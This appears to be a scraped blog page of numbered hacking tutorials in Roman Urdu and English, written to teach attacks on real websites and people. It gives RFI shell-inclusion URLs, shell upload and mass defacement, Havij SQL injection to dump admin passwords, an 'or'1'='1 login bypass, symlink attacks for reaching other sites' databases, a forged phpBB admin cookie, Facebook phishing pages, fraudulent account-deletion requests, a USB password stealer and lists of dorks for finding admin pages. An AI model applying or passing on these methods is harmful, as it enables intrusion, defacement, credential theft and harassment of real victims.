Is se site is tarah hojaegi: Www.abc.com/index.php?action=www.yourt35site.com/c99shell.php?
Shell ka link php tak hai, Us k baad aapne ? lagana hai warna is k baghair shell execute nahi hoga

H-157
P6
Phir aapki control hogi us site pe. Jo bhi krna hai karen. Contents del marden ya apna deface page upload kren.
------Finish----

H-158
P7:
RFI, ka example he, site.com/page.php?id=http://yoursite.com/shell.txt -o killer.php ya shell.txt?

H-159
P8:
Rfi remote file inclusion.
Ap server ko bewakof bna kar us mai ek file daltae ho jis se ap b admin wale kam kar sakte ho.Yae fills shell kelatae hain.

H-160 r00t se whm tak acces h0ti ha ap ssl client ya r00tkits ya putty se b login hoskte hen sh client se r00t server ka main chez js par p0ray system par acces milti ha means u can access all h0sted on same server

H-161 LFI k lye data tamper addon use kya jata he

H-162
P1:
Web par shell upload k bad web par deface page mt dalo.Bal k local§host k folder mai ja kar deface page dalo..Error 70 i ya tou vuln nh.Agar nh iya error then tm ne mass deface kardia.Ku k dnn windows server ha

H-163
P2:
or local_host ma deface page dalne se sb web ek sath deface hojai ge jo server pr honge.Kise server pr 100 kse pr 100 kse pr km hoti hyn.Is tarha ap ek sath itne web hack kardo ge.  .
Waise windows hacking mai maza nh.Yae he kam linux par karne k leyae skills chayae.

H-164 ek chota id hacking.
Download ie pass recovery.Wo jitne b auto save pasword hai computer mai nikal k samne la dai ga.Ap phr net par search karo how to hack id by usb.
Wahan ek code hoga wo copy karna note pad mai aur .Bat ke extension mai dal dain usb mai. .Bat wali file cmd mai khulti hai..Yani .Bat ke file aur iepass recovery usb mai dalne hoge.Phr jis computer mai usb lagao ge us k auto save pasword tmare pas..Thanks

H-165
Wht is banner grabing?
Ap server ke info nikaltae ho.Os version wagaira..
Ap jb server ke info nikal loge tou further exploit kar saktae ho.
U need netcat.
Phelay port find karo.Netcat se kar saktae ho.But i recomend nmap.
Then port aur ip se karo exploit.
Type some thng -v -n ip port

H-166
p1:
PHP ki urdu pdf book download krlo.just visit www.smssms.tk

H-167
P2:
PHP is a general-purpose scripting language originally designed for web
development to produce dynamic
web pages

H-168
p3:
php aik programing language hai. Bohat se php file mil kr aik script bnate hai. Yeh aik kisam ka online software bn jata hai. Bari site hamisha php script main hote hai.Jaisy google, youtube,twitter,facebook ye sb sites php scripts ma bne hote hn.Or inka clone yani iske nqal script net sy easly thori se search k bad mil jaty hn.Best site scriptmafia.org ha jahan sy hr qisam k script mil jaty hn

H-169
p4:
Jis sy apna apna search engine, fb jaise site, job site, marraige site, projects site, ptc sites, bna skty hain. Yeh php scripts bohat costly hoty hain. Magar programer  isko null kr daity hain mean  unhain crack krty hain. Aur inke protection ko remove kr daity hain. Is tara hm isy free use krty hain. Likin null script main aik masla hota hai ky isky 1, 2 features kam nain krty. Aur agar koi masla ajai tu script bnany wale company ko complain b nain kr skty.

H-170
P5:
but php web prgrming lang he uske b bugs hn jinhe lfi & rfi kha jata he,& also http get, headers se info le kr sites hack ki jati hn,iske lye accunetix use kya jata ha http editor,& php injection like rfi lfi to sbko pta ha via metasploit b inject kya jskta ha

H-171
P1:
A General OverView on DNS Poising Url Redirection.
Ap yae kaam cain and abel se kartae ho.Cain hash decyption k b kaam ata hai.
Dns poising url redirection mai attacker victicm ko kise khas url par redirect karta hai.

H-172
P2:
Jaise victim jb b facebook.Com khulae to facebook ke jaga myspace khul jai. . .
Is mai 3 ip involve hnge.
Attacker
victim
router
hota yae hai jb b victim web khole ga tou router ko request jati hai aur web khulti hai.

H-173
P3:
Lekin dns poising mai victim ke request router ke jaga attacker ko ajati hai aur attacker url change kar k router ko request daita hai.
Jaise Ap facebook kholae aur mai facebook ke jaga apne fake page k url ke tarf redirect kardn.
Jb b wo facebook.Com khole ga fake page khule ga usko pta b nh chala.
Yae smjhane k leyae bola.Just imagine ap is se web hacking mai kia kia kar saktae hain.
*finish*


H-174
P-1
Me lecture bhej raha hun,
/"How to hack DSL connection.?"/

H-175
P2
What is DSL
It stands for Digital Subscriber Line
It Offers High Data Transmission Rate b/w 128Kb - 10Mbps
Its a Special Line Via which U can Use Internet as well Phone
It works via network cards and DSL Modem
DSL Types ADSL, R-ADSL, HDSL, SDSL & VDSL

H-176
P3
How To Hack DSL Connecting ?
1st Download Ip Scanner From www.Itshine.tk
And Than Install It after Install Open Google And Type In Search Bar What is My Ip and Press Entry Now Open 1st link and See ur Ip..

H-177
P4
Now U Will See Ur Ip E.g 256.100.580.100 Now Open Ip Scanner Software And You Will See 2 Columes Now Write Ur Ip Like this 256.100.580.(1) And In 2nd Colume 256.100.580.(254) Remember that Don't Use () ok Change ur Ip Last number ok..

H-178
P5
Now Click On Start And Wait 4 Process Will Complete when Process Completed now Right Click On Any Ip On That Software And Copy the Ip And Paste it in Address bar And entry Now its Ask ur about user and Pass (admin) is User and Pass And Now Enjoy... if u have any Problem Ask Me Thanks Hope U Like it... remember me in ur Prays.End

H-179
(HacKiNG)
P1)
FB Ki ACouNT HacKinG ThrouGh FaKe PaGe Ho SakTi HaI,
InTroDucTioN:
Is FaKe PaGe Ke ZariYe HuM FB Ka AcounT HacK KaR SakTaY HaiN..
Ye SaMe To SaMe Face BooK LoGiN JaiSa PaGe HoGa..
AuR KiSi Ko ShaK (DoubT) Bi Ni HoGa..
See NexT

H-180
(HacKiNG)
P2)
Ab AaTeY HaiN Is FaKe PaGe Ki CoNsTrucTioN Ki TaRaF
CoNsTrucTioN:
Face BooK FaKe PaGe DownLoaD KaRo GooGle Se.. EasiLy MiL JaYe Ga..
PhiR Is FaKe PaGe Ko UpLoaD KaRo..
Ab QuesTioN Ye HoTa HaI Ke UpLoaD KaHaN KaRaiN...?
AnSweR:
KiSi Bi Free Web HosTinG SiTe 4 ExaMpLe 000a.biz
110mb.com
Byethost.com
In MeiN AcounT BaNao..
Aur FTP SeRveR MeiN Jao..
WaHaN PaR Index NaMe Ki FiLe HoGi
See Next

H-181
(HacKiNG)
P3)
Us Index FiLe Ko RepLace KaRo ApNaY FaKe PaGe Se...
Lo Gi ApKa FaKe PaGe Ho GaYa CoMpLeTe...
Now QuesTioN AriSe Ke Ab IsKo Use KaiSe KarNa HaI...??
AnS: JaB Ap Free HoStiNg MaiN ApNi SiTe BaNao GaY,
To Jo SiTe LinK HoGa Wo ApNaY VicTiM Ko SeNd KarNa HaI,
Agar Wo FaKe PaGe Se WaKiF Na Hua To Wo Us MaiN LoGiN KaraY Ga,
TaB UsKi ID WiTh Password Apke PasS Aa JaYe Ga..
Q:Who Is VicTiM..?
Ans:VicTiM UsaY KehTaY HaiN JiS Ka AcounT Ap HacK

H-182
TXT" Ke NaMe Se Aa JaYe Gi AgaR VicTiM Ne ApKe FaKe PaGe MaiN LoGiN Kia Hua HoGa To UsKi ID And Password Us FiLe MaiN Aa JaYe Ga...
<==The End==>

H-183 facebook pa ksi profile ko hack krny k lia kai s/w han par,
''Facebook pass steal v.3.0''
Sb sa tey kam krta ha.
Iss pa e-mail likhy pas apko pata lag jay ga.

H-184 apko boht fake trix n toolz mila ga but real hack jst viruses sa ho ge.. Ap victim pc ma virus attack kre.. N remote pc sa paswrd hasil kre.n cyber attack sa un ki firewal n antivirus corrupt kren

H-185
*Introduction about Hacking*
P1 What is Hacking??
Why we Hack a Site??
How is it possible to Hack a Site??

H-186
P2 Hacking means "Get the Admin Rights on any Site and upload ur Deface Page"
Simply u can say that it means "Breaking the Security"
Now a days, Cyber Wars going on the top with Paki and Indian Hackers. Its a very sensitive and amazing compatition.

H-187
P3 If u Hack any Site of any Country(except India),U may be arrested.For this reason,We have to Hide our Ip Address.Many Sites & Softwars provide us Fake Ips.There r many ways & methods of Hacking.In my opinion"Sql Injection"is very easy 4 beginners.We use Scannerz,Tools, Softwarz,Key Loggerz, Shellz,Deface Pagez, Trojanz,Virusez etc 4 Hacking.I think that"Hacking is not a Crime,Its jst a Game of Mind

H-188
P1
Havij to hai na sab k pas nai hai. To Dwnload maar lo. .
Http://adf.ly/yMkT
Then mint mai instal maro. . . Or open kro. .

H-189
P2
Havij mai zyada noob user's ko ye msla bnta hai k dork lga k koi site lga dalte hn. Or us dork mai itni vulnrble sites milti nai. Ak do site lgai havij ne Not Vulnerble eror dy dya. . .

H-190
P3
To Phle ap ko Sites daikhni hain k kn si Hackable (vulnerble) hai. Us k ly visit the link.
Adf.ly/yMpl

H-191
P4
us link se ak web open hogi.  killerblck aple naam ki.
Jo k online Scaner hai.
Black screen hogi or upar Green color mai likha hoga.
SQLI Scaner By Xuhaid
Dork
Neche Blank mai ap apni marzi ka fit sa dork lgao. .
Dork list pas rkho. . Then start pe click kro. . .

H-192
P5
Start krte he. Scaner webs scan kre ga or Vulnrble sites k agay Sql injection Success Green color mai likhe ga. Or Not Acces Red mai lekhe ga.
Sql acces wala koi ak link cpy kren. Havij mai paste

H-193
P6
Online minto ma boht c vulnrble sites dyga ak ak kr k havij ma dalo or scan kro. .Havij har ak ka Target Vulnerable he kahe ga..

H-194
P7
HAVIJ mai scan kro jb scan ho jai to. DB pe Click kro. Then Scan hoga data base  . . .

H-195
P8
table pe click kro ge then Get DB pe to data base scan hoga.Jb ajai data base to jtne option ayen unhe slect kr k Get Table pe click krn

H-196
P9
Table find krne k bad Admin User Id in option ko daikhen. Or un k colum. . Scan kren. . . Bilqul tartib se chaln hai. Get Db then Get Table Then apne kam ki chez just (admin pwd id) ko select kr k Get Column

H-197
P10
Admin paswrd id. K colum ko select kr k get data pe clik krna. . Paswrd id bta dyga. . Ya hashs mai hoga. . . Md5 wale tab ja k post krna admin paswrd mil jai ga. . End. .

H-198
P1
A little info abt symlink.Symlink hacking mai buhat kam ke chez h.
Is se ap web ka pura data base download kar saktae ho aur hack b.

H-199
P2
Symlink mean similar link.Ye chez linux operating system ne nikali the.Jo log ubunto,fodora ya linux use kartae h unko pta hoga.Symlink tora folder shortcut ke trha hota h.Ap ubunto ma simple foldr pr right click kr k symlink pr click krn ge to ek new foldr bn jaiga symlink ka

H-200 P3 Basic different symlink aur folder shortcut mai path ka h.Folder shortcut mai path wohe i ga jo real folder ka h.Lekin symlink ma path kuch alag hoga

H-201
P4:
Symlink ka path alag hone k wja se ap ek chez ko alag alg jga se cnnect or use kry ho.Example ek portable hardisk k symlink bnai or ek mobil connectivity ma dal dia ek local_root ma etc.Is se portable hardisk ke speed pr frq ni pryga.Symlink alag path jo bnai ga sb k

H-202
P5 Alag path hnge par excess same chez hoge. . .
Path alag hone ke waja se jo chez par parword ya koi restriction lage ho k ap nh khol saktae.Agar us ka symlink bnaya jai tou wo file khul jai ge.
Nw yae symlink ke info the nw use off symlink in hacking.

H-203
P6 Hr web ek computer se chlti h called server.Us server pr hr web ka folder hota h jis ma web ki sari file wagaira save hoti hn.Sirf kuch file ko public rights diye jaty hn.Baki files ko koi nhi chhaer skta admin k ilawa Qk wo public nh.Jb b file open hoti h server check krta h link path k ye file kon khol skta h.Nw hr web folder ma usky pasword b save hnge.Pura data base save hoga.Agr data base download kr leya jai tou web hack

H-204 P7 Nw ap web ka data base download karne k leyae web k folder ka symlink bnao ge.Waise wo folder khul nh sakta.Lekin ku k symlink mai path alag, magar excess same chez hoti h tou ap data base ka symlink bna kar wo folder khol loge.And finishd ur victim.

H-205
P8 Symlink bnane k leye apko shell chahye hoga uploaded kisi web pr.Shell jis web pr uplood hoga us web pr ap changes kr skte ho.Nw jis server pr apka shell wali web h us server pr apna victim dhundo.Then shell se symlink bnao server pr apne victim k data base ka.Or ghus jao data base ma.

H-206
P9 Symlink bnane k leye kuch code use hoty hn jo exploit kehlaty hn.Kafi ache exploit mil jaege pr jo boht ache hoty hn wo privat hoty hn log share ni krty
Symlink ka advantage ye hua k frz krn ek web hack krna muskil h par jis server pr web h usi server ki dusri web hack kr k ap symlink apne victim ka bna kr uske tyt security b zero krdo.Matlb kise b server ke ek web hack krli jai tou kafi chance h ap us server k dusri web b hack kr skty ho by symlink

H-207
P10 Symlink sirf ek link bnata h jo apko web ka data base wagaira asani se excess dai ga.Acha symlink server par bnta h.Aur server par kuch karne k leyae apko shell chayae.
Shell ap koi b bikar web hack kar k upload kardo.

H-208 P11 Simple words ap ek server ke koi b ek web hack kar k dusri un hackable web hack kr skty ho.
This tut is made by saadi 4
.End

H-209
Salam frndz. Lecture is going to start on lis method

H-210
P1
IIS h4cking k liye dorks to koi nahi hai, but Google.com me kuch b search krlen or jo site b aaye use check kren.

H-211
P2
Us site ka link copy karen, Www.site.com,phir start pe click karen or run pe click karen or usme ye code likh k enter karen:
%WINDIR%?/EXPLORER.EXE,::?(20D04FE0-3AEA-1069-A2D8-08002B30309D?)?/::?(BDEADF00-C265-11D0-BCED-00A0C90AB50F?)

H-212
P3
Web folders khul jaega, pihr usme file pe click kren, phir new pe or phir webfolder pe.

H-213
P4
Add webfolder wizard ajaega. Usme apni site paste karen www.site.com or next karen.

H-214
P5
Agar to next hojata hai iska matlab hai k site vul hai or agar connect nahi hota to vul ni hai.

H-215
P6
Agar next hojae to uska koi bhi name rakhen or finish krden.

H-216
P7
Ab webfolder me wo site aa chuki hogi us pe double click kren. Wo khuljaegi. Ab uspe apna page upload krden like u.h.html. Apne page ko copy karen or isme la k paste krden isi tara shell b daalende. Apne shell.php ko copy karen or site k folder me paste krden

H-217
P8
Apna page view krne k liye www.site.com/u.h.html or shell dekhne k liye wwe.site.com/shell.php.
----FINISH----

H-218
P1.
Trick 4 Iis hacking meth0d
Iis me hm last me apne deface page ka nam likhte hain site link k agey like www.site.com?/hack.html

H-219
P2:
but agar hum apna deface page ka nam php xtensn me rakhen jase defacepage.php aur is ise upload karen iis method se. To hamara deface page site k h0me page pe show ho ga agey apne deface page ka nam likhne ki zrorat ni . . ! Trick w0rking but n0t on all iis vul sites. . ! Iski reazn shayd ye k server html se pehle php chk karta ha. .

H-220
P3: Iis se site hack ho to jaldi jati hai. . . Par search krna  rola hota hai. . Us ne whan sb ki list daikhi or kha in ko mai hck kr skta hn. . Kr to koi b skta hai par wo khud search kr k hck kr k btai na. . . Kahan milti hn 2003. Win ki sites. . .

H-221 Iis ki vulnerablity chinese webs mai bhot hoti hai kiu k china webmastero ko is vul. . Ka nai pata.
Is ki vul. Webs search krni ho to Google.cn mai china k google mai search kro.. Google.cn mai dork lgao.


H-222
iis ki vulnerable sites nai milti. . . . . . . Web dave. . .

H-223 jb koi site hack ki jaye to us ka ooper link b hona chahiye . . . Like this www.site.com/admin_login.asp isi trah hr site ka apna link hota h. Jb aise link pr jayen to wahan 2 lines hoti hn username and passwors un dono ko fill kro or site mn hr chez edit kr do. . . Ok

H-224 TROJANS : -
 Trojans can be used to do sily things to a system like changing desktop, user interface, to0k c0ntrol of m0use etc..
it can also be used to do s0mething serious like accesing ur data, erasing ur files, stealing paswrd etc.
 End

H-225 Aucntix vul find karta ha k ye site hack ho skti ha k ni . . . Agar ho skti ha to kis meth0d se?

H-226
P1: Vbulletin hacking.
Vbulletin mai bugs nikaltae hain expert inko exploit boltae hain.Ache bugs private hotae hain.Ek purana exploit share karta hn.

H-227
P2:This exploit is for vb 3.8.6.Faq.Php nam h.
Aj kal takreban sb forum patch hain.Matlb is bugs se secure.Jb b bug public hota h tou patch ata h

H-228
P3: Pehlay apko ek web chayae hoge vbulletin 3.8.6 par.
Find it by this dork.
Powered by vbulletin 3.8.6.
Yae apko dunya br k forum btai ga.Sirf indian forum chayae tou go0gle dork yae hoga.
Powered by vbulletin site:.In
then web khol k faq par click karen.
And type database agar forum vuln hua data base ke info ajai ge samne.
Newest vbulletin public exploit sqli vuln exploit h vb mai.Nam is 0 day exploit.Yae exploit group search sqli vuln ke tarha h.

H-229
P4:Sqli vuln vbulletin 4.0.3 to vb 4.1.3 tk the.Iska patch i ya.Par dubra vuln i.Nw ths is embarssing abt vb security.
End

H-230 vbforum md5 +salted hashes h0te hen wo easily crack nai h0tay insidepro par list bna kr hashes ki send kro wo krdngay, ya passpro t0ol best he time lega..

H-231 i garantee tm logo ko yae asan tareka nh pta hoga.Methd stil private hai.
Install/install.Php
ek tarekae se recove kar saktae ho.Server-db par ek perl exploit parha hai lekin public nh hai.Tm instal/instal.Php recover mar k vb dubra instal mardo ge..

H-232 cokie stealing sb ko pta hai..Ap ek asan tareke se begair victim ko java script addres bar mai execute kara k kaise grab karoge.Yae main bat hai.Kisi ko tm ma se.Cokie stealing ati hai..
T35-cookie bug download kar sab cokie ajai ge samne

H-233 vbulltin hacking.a simple vulnibility found in vbulltin 3.8.6.Ap jao aur jo nam admin ka hai us name se regestration karo.Agar admin name hai web onner ka tou registration mai likho name ke jaga admin&#00.Ap admin k name se regester hojao ge.Yani vb forum par 2 id hnge admin k nam ke.Aur jo b pm wagaira admin ko kare ga apk pas b msg i ga.Patch a chuka tha.Purani vuln hai.Version b purana.Dork powered by vbulltin 3.6.8.

H-234 (comment):Bt Aesi id ko admin jis wakt dkh le usi waqt ban krta ha. . ! Aur zada tar mein admin name ka id ni hota owner/admin ka. . ! Aur Admincp mein plugin instal kia jata ha jis mein pvt msg ka cmplete log hota ha. !


H-235
How to delete any ones facebook account a little bit of social engeenring?
Page no.1
Requirements.
1. Victom ka full name
2. Victom ki date of birth
3. Victom ki fb profile ka url address
4. 1 id banayen yahoo per ya gmail per victom kr first and last name ki.
Yeh sari details ap ko victom ke fb account se mil jayen gi.

H-236 P2
5.Ab is link er jaen
www.facebook.com/help/contact.php?show_form=cannot_identify
6.Ab jo sari requirements thi wo is form ma fill kr dyn

H-237
P3
7. Form ke last option main 'description of your issue'
Us main ap khud victom ban ke kahen je meri yeh id kisi ne hack kr li hai main 1 regulr membr hn or new acnt bnane mn mjhe koi diqqat nhn h.
Facebook team ap ki yeh application parhtw hi wo account 24-72 hours main del mar de gi. And da victom is fuCked.By Th3.sh3r4x.

H-238
How to hack fb account with phishing page.
Page no.1
1. Taqreban aksar free hosting site pr acnt nhn ban rahe ya phr un sites ke link fb per shaere nhn hote sub se pehle my3gb.com per free register hon.
2. Ab facebook.htm or .php download karen ap ko sherazhackz.tk per mil jayen gen ya ksi b hckng blog ya site pr b mil skty hain.

H-239
P2
3. jo ap ne facebuk.html or .php download kiye they wo files apne my3gb.com waley accout pr upload kar den.
4. Ab my3gb.com wale accnt mn jo facebook.htm h us file per right click karen or 'copy link address kren.
Now yeh addres apne victoms ko den jb wo login ho ga fake pg mb to us ka pw ap ke my3gn account mn a jae ga. Th3.sh3r4x*

H-240
How to Hack any Site by Sql (Beginning)?
Step 1: Firstly open Google.
Step 2: Now type there: inurl:adminlogin.asp
Step 3: Now open any Site. The site will be something like this: http://www.site.com/adminlogin.aspStep 6: Now in Admin Panel, type in Username: 'or'1'='1 and also type this at Password.
Step 7: Now Site will open. Find here the uploading image option (Add product, Edit product etc) and upload your Deface Page by Shelled it.
(By PkAry)

H-241
SQL Helper Or Havij dono alag alag Tool hain SQL vulnerble sites hck krne k ly. . . SQL helper bhtr hai is ly is msg mai Main tool Sql helpr use keya gya hai or Havij ko sirf admin page find krne or md5 hash crakng k ly use keya gya hai. . Dorks google mai bhot mil jate hn. Exploit scaner tool se vulnrble sites find ki jati hain. In sb ki alag alag f ul dtail google or utube se mil jai gi. . .

H-242
Ye Page jst web hacking vulnerablities hain. . . Har ak tariqa full tutorial rkhta hai. . . In mai jo comon use hote hn. Wo
SQL INJECTION. RFI LFI IIS DNN XSS hain,. . .

H-243
DownLoad "Magic Blue Hack" From upLoading.com And Hack other's Mobile without Getting permition.

H-244 Dork ek esi string ya query ko Kehty hai jo Huma Un pages tak poncha day GA jo google na chupaya hai.yane website k admin login page our vulnerable:) our Hidden Ip k liye software koi b acha nai hai qk App k ip wasa b catch ho gy jb app hacking karta ho hidden nai hota ip kabi b... Wasa 4 safety use easy Hidden ip software.

H-245 Mask ip changer thek hai our Hide easy ip b thek hai itshine.tk sa pak k site hack nai karo baqi kisi k b site karo kuch nai ho gy without ip changer i don't use

H-246 Kuch Dorks yah hai
Inurl:index.php?id=
Inurl:news.php?id=4
inurl:adminlogin.asp
inurl:admin_login.asp
inurl:adminlogon.asp
inurl:admin_logon.asp
inurl:??admin/admin_login.php
inurl:/admin.asp
inurl:/login.asp
inurl:/logon.asp
inurl:/adminlogin.asp
inurl:/adminlogon.asp
inurl:/admin_login.asp
inurl:/admin_logon.asp
inurl:/admin/admin.asp
inurl:/admin/login.asp
inurl:/admin/logon.asp

H-247 some Dorks
P2:
inurl:/admin/adminlogin.asp
inurl:/admin/adminlogon.asp
inurl:/admin/admin_login.asp
inurl:/admin/admin_logon.asp
inurl:/administrator/admin.asp
inurl:/administrator/login.asp
inurl:/administrator/logon.asp
inurl:root/login.asp
inurl:admin/index.asp
Regard D34DM4N

H-248 Ap apni gmail id hack hone se bacha sakte hen. How? Visit this link http://huff.to/h3zzBm

H-249
P1 How 2 hack vublltin
1.jst visit forum in mozilla firefox
2.close the browser
3.open cookies.txt (c:documents and settings/username/application/data/mozillafirefox/profile/blah.defult) nw look 4 127.0.0.1 false / false 1141920503 phpbb2mysql_data a%3a0%3a%7b%7d

H-250
p2
replace above with 127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data b%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3Bs 3A6%3A%22userid%22%3Bs%3A1%3A%222%3B%7D
Save cookies.txt
nw open browser n go 2 forum nw u hv admin rights
           --finish--

H-251
If anybody wants to become a world class hacker. Then open this all in one site :
Hackforums.net
Dunya k tamam hacking forums k admins ne yaheen se sub seekha hy.

H-252 yahoo Hacking K Lie Download (Trojan Maker)r(Mps) (Bus Hack) r (Deep Throat Trojan).Or Net Hacking K Laha (Download Net Hack 3.4.2)

Post a Comment

 
Top